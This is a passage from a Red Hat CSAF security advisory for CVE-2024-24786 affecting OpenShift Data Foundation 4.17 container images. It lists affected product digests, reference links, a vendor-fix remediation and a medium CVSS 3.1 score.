"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24786"
},
{
"category": "external",
"summary": "RHBZ#2268046",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786"
},
{
"category": "external",
"summary": "https://go.dev/cl/569356",
"url": "https://go.dev/cl/569356"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/",
"url": "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-2611",
"url": "https://pkg.go.dev/vuln/GO-2024-2611"
}
],
"release_date": "2024-03-05T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
